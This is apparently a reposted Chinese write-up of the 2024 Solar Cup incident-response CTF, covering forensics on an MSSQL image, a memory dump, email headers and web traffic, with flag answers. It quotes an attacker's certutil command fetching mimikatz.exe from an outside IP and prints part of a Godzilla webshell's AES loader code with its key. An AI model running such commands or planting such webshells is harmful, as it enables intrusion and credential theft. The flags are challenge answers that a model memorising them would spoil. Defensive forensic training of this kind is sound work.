2024第一届Solar杯应急响应挑战赛

news/2024/12/28 22:20:11/文章来源:https://www.cnblogs.com/lpppp/p/18638061

2024第一届Solar杯应急响应挑战赛

附件密码:

KzXGabLkDjs&j@3a&fAayNmD

数据库

这里导入镜像有个问题会报错

Failed to write content to disk F:\长城杯+国赛\应急比赛\【题目】小题+综合题\solar\mssql\mssql\\mssql-disk1.vmdk. Reason: There is not enough space on the file system for the selected operation。

解决问题,打开 mssql.ovf 把这个位置,改成这几 vm 的版本,然后再将 mssql.mf 里面的哈希值替换一下,然后就能导入成功了

certutil -hashfile mssql.ovf SHA256

image-20241228170325-2k4v4qy

接着使用大白菜修改密码 Vmware虚拟机中windows系统用户名密码忘记处理方法 - 简书,这里有些几个步骤不一样,我们设置好大白菜的镜像后,开机后重启,一直按 F2 进入 BIOS界面,后面就一样了

image-20241228172055-j09u4ac

然后将镜像文件在设置回来就能用我们的密码进行登入了

image-20241228172300-jq2mg7q

数据库-1

题目:

题目附件:mssql、mssql题-备份数据库
请找到攻击者创建隐藏账户的时间
flag格式 如 flag

思路:

 我们刚刚在登入的时候有个 test$ ,直接查看这个用户就行
net user test$

image-20241228172834-8b5hu1t

flag:flag{2024/12/16 15:24:21}

数据库-2

题目附件:mssql、mssql题-备份数据库
请找到恶意文件的名称
flag格式 如 flag{ . }

思路:

上传我们的火绒剑找打

image-20241228173632-dwsai10

flag:flag{xmrig.exe}

数据库-3

题目描述:

题目附件:mssql、mssql题-备份数据库
请找到恶意文件的外联地址
flag格式 如 flag

思路:

问题 2 找到的

flag:flag{203.107.45.167}

数据库-4

题目描述:

题目附件:mssql、mssql题-备份数据库
请修复数据库
flag格式 如 flag{xxxxx}

分数

99.34 分

数据库-5

题目描述:

题目附件:mssql、mssql题-备份数据库
请提交powershell命令中恶意文件的MD5
flag格式 如 flag

内存取证

内存取证-1

题目描述:

题目文件:SERVER-2008-20241220-162057
请找到rdp连接的跳板地址
flag格式 flag

思路:

直接查看网络扫描使用,netscan 插件,看到 443 端口连接的地址

image-20241228130008-0anhjx5

flag:flag{192.168.60.220}

内存取证-2

题目描述:

题目文件:SERVER-2008-20241220-162057
请找到攻击者下载黑客工具的IP地址
flag格式 flag

思路:

查看一下命令扫描 cmdscan 发现执行了 curl 指令
certutil -urlcache -split -f http://155.94.204.67:85/mimikatz.exe C:\Windows\Temp\mi.exe

image-20241228130522-0om7ps8

flag:flag{155.94.204.67}

内存取证-3

题目描述:

题目文件:SERVER-2008-20241220-162057
攻击者获取的“FusionManager节点操作系统帐户(业务帐户)”的密码是什么
flag格式 flag

思路:

 我们在题目 2 中发现 type pass.txt 这个命令,然后我们 找到,pass 文件使用 dumpfiles 插件导出

image-20241228150142-9ntq2pj

image-20241228150200-b6t8a37

flag:flag{GalaxManager_2012}

内存取证-4

题目描述:

题目文件:SERVER-2008-20241220-162057
请找到攻击者创建的用户
flag格式 flag

思路:

使用 hashdump 可以查看用户名密码信息

image-20241228131840-mql5mfi

flag{ASP.NET}

内存取证-5

题目描述:

题目文件:SERVER-2008-20241220-162057
请找到攻击者利用跳板rdp登录的时间
flag格式 flag

思路:

  找到登入的时间,我们去分析一下日志文件,先把日志文件都导出来利用 MemProcFS 这个工具,然后直接使用日志文件分析工具进行分析,全拖进去就行

image-20241228153039-19rawqn

image-20241228153134-u1219bl

flag:flag{2024/12/21 00:15:34}

内存取证-6

题目描述:

题目文件:SERVER-2008-20241220-162057
请找到攻击者创建的用户的密码哈希值
flag格式 flag

思路:

根据题目 4 可以看到 哈希值

flag:flag{5ffe97489cbec1e08d0c6339ec39416d}

签到

题目描述:

本题作为签到题,请给出邮服发件顺序。

Received: from mail.da4s8gag.com ([140.143.207.229])
by newxmmxszc6-1.qq.com (NewMX) with SMTP id 6010A8AD
for ; Thu, 17 Oct 2024 11:24:01 +0800
X-QQ-mid: xmmxszc6-1t1729135441tm9qrjq3k
X-QQ-XMRINFO: NgToQqU5s31XQ+vYT/V7+uk=
Authentication-Results: mx.qq.com; spf=none smtp.mailfrom=;
dkim=none; dmarc=none(permerror) header.from=solar.sec
Received: from mail.solar.sec (VM-20-3-centos [127.0.0.1])
by mail.da4s8gag.com (Postfix) with ESMTP id 2EF0A60264
for ; Thu, 17 Oct 2024 11:24:01 +0800 (CST)
Date: Thu, 17 Oct 2024 11:24:01 +0800
To: hellosolartest@qq.com
From: 鍏嬪競缃戜俊
Subject:xxxxxxxxxx
Message-Id: <20241017112401.032146@mail.solar.sec>
X-Mailer: QQMail 2.xXXXXXXXXXXflag格式为flag{domain1|...|domainN}

flag:flag{mail.solar.sec|mail.da4s8gag.com|newxmmxszc6-1.qq.com}

日志流量

日志流量-1

题目描述:

题目文件:tomcat-wireshark.zip/web
新手运维小王的Geoserver遭到了攻击:
黑客疑似删除了webshell后门,小王找到了可能是攻击痕迹的文件但不一定是正确的,请帮他排查一下。
flag格式 flag

思路:

直接使用 D 盾进行扫描,扫到一个后门文件

image-20241228134213-4d5g05u

image-20241228134451-khrx4x4

发现密文

ZiFsXmEqZ3tBN2I0X1g5ektfMnY4Tl93TDVxNH0=

image-20241228134515-2676a8s

flag:flag{A7b4_X9zK_2v8N_wL5q4}

日志流量-2

题目描述:

题目文件:tomcat-wireshark.zip/web
新手运维小王的Geoserver遭到了攻击:
小王拿到了当时被入侵时的流量,其中一个IP有访问webshell的流量,已提取部分放在了两个pcapng中了。请帮他解密该流量。
flag格式 flag{xxxx}

分数

85.95 分

思路:

通过题目 1 我们能找到 aes 加密的密钥:a2550eeab0724a69
 String code="ZiFsXmEqZ3tBN2I0X1g5ektfMnY4Tl93TDVxNH0="; String xc="a2550eeab0724a69"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}

查看流量包也知道这是一个哥斯拉的流量,解密就行

image-20241228135237-01u6kq7

flag:flag{sA4hP_89dFh_x09tY_lL4SI4}

日志流量-3

题目描述:

题目文件:tomcat-wireshark.zip/web
新手运维小王的Geoserver遭到了攻击:
小王拿到了当时被入侵时的流量,黑客疑似通过webshell上传了文件,请看看里面是什么。
flag格式 flag

逆向破解

逆向破解-1

题目描述:

题目文件:【题目】加密器逆向
请逆向该加密器,解密机密文件
flag格式 flag

综合应急

综合应急-1

基本全蒙的没时间了,找到了一些 ip 和 PowerShell 命令

image-20241228161806-ru1rdrc

综合应急-2

题目描述:

题目文件:FOG日志
攻击者上传了代理工具,请写出他的最终存放路径
格式为flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/860582.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【攻防技术系列】反弹shell:数据不出网

数据不出网:限制出网协议,不是所有的协议、IP不出网 不出网一般是针对出站的。流程: 1.判断出入站规则限制 2.判断出入限制的端口和协议 3.分析原因用正向、反向、隧道解决问题 产生原因: 主机、应用防火墙、云、工具出站限制 所有的限制都是相对于这台服务器 出站规则:自…

22207223-王颖对于家居强电电路模拟程序3~4的总结

一、前言 1.家居强电电路模拟程序3 1.1知识点 (1)面向对象编程(OOP)类与对象:需要设计多个类,如设备类(电路设备类)、受控设备类、控制设备类、串联电路类、并联电路类等。 继承与多态:受控设备类和控制设备类可以继承自电路设备类,利用继承实现代码复用和扩展。 接口与…

Android 系统架构

Android 大致可以分为四层架构: Linux 内核层, 系统运行库层, 应用框架层, 应用层.图 1 Android 系统架构Linux 内核层 Android 系统是基于 Linux 内核的,这一层为 Android 设备的各种硬件提供了底层的驱动,如显示驱动、音频驱动、照相机驱动、蓝牙驱动、Wi-Fi 驱动、电源管理…

五上数学第1次期末模拟情况反馈204班

五上数学第1次期末模拟情况反馈204班 本周进行了数学地1次期末模拟的综合练习,已经进行了讲评,但是没有讲评完毕,只讲到解决问题的第1题。试卷和答题卡已经下发,请学生带回家改完错误(改在答题卡上面,可能改到讲评的地方),家长签字。 签字在试卷的左上角,签字示范:家…

PCIe扫盲——Type0 Type1 型配置请求

前面的文章中介绍过有两种类型的配置空间,Type0和Type1,分别对应非桥设备(Endpoint)和桥设备(Root和Switch端口中的P2P桥)。 Type0还是Type1是由事务层包(TLP)包头中的Type Field所决定的,而读还是写则是由TLP包头中的Format Field所决定的。分别以下两张图所示:之前…

2024-2025-1 20241307《计算机基础与程序设计》第十四周学习总结

作业信息这个作业属于哪个课程 (2024-2025-1-计算机基础与程序设计)这个作业要求在哪里 ([2024-2025-1计算机基础与程序设计第十四周作业]这个作业的目标作业正文 (2024-2025-1 学号20241307《计算机基础与程序设计》第十四周学习总结)教材学习内容总结 C语言程序设计第十三…

Blog-3 题目集7~8的总结

22207203-陈思思 一、前言 (一)第7次题目集(家居强电电路模拟程序-3)知识点:串联电路:电流相同,电压分配。 并联电路:电压相同,电流分配。 类的设计:电路设备类、受控设备类、控制设备类、串联电路类、并联电路类。 数据结构:使用列表或字典存储电路信息、设备状态。…

已有docker镜像构建过程分析

转载请注明出处: 1.使用docker history进行分析  docker history 命令用于查看指定镜像的历史层信息,它显示了镜像创建过程中的每一层,包括创建时间、创建者、大小和注释等信息。 查看镜像历史docker history myimage:latest使用示例:root@controller1:~# docker images …

Linux操作文件IO

Linux操作文件IO参考自:【北京迅为】嵌入式linux开发指南_v1.1(i.MX6ULL)文件 IO 是 Linux 系统提供的接口,针对文件和磁盘进行操作,不带缓存机制; 标准 IO 是 C 语言函数库里的标准 I/O 模型,在 stdio.h 中定义,通过缓冲区操作文件,带缓存机制。Linux 系统中一切皆文…

K230学习记录

K230学习记录 参考自: # 立创庐山派-K230-CanMV开发板资料与相关扩展板软硬件资料官网全部开源 # 开发板官网:www.lckfb.com # 技术支持常驻论坛,任何技术问题欢迎随时交流学习 # 立创论坛:www.jlc-bbs.com/lckfb串口0(115200),连接进入打印U-Boot信息ctrl+R可以快速重装…

windows与虚拟机linux通过ssh进行连接并上传文件

windows与虚拟机linux通过ssh进行连接并上传文件 windows配置 以管理员打开powershell下载和启动安装ssh客服端 Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 Add-WindowsCapability -Online -Name OpenSSH.Client~~~~0.0.1.0 Start-Service sshd Set-Servi…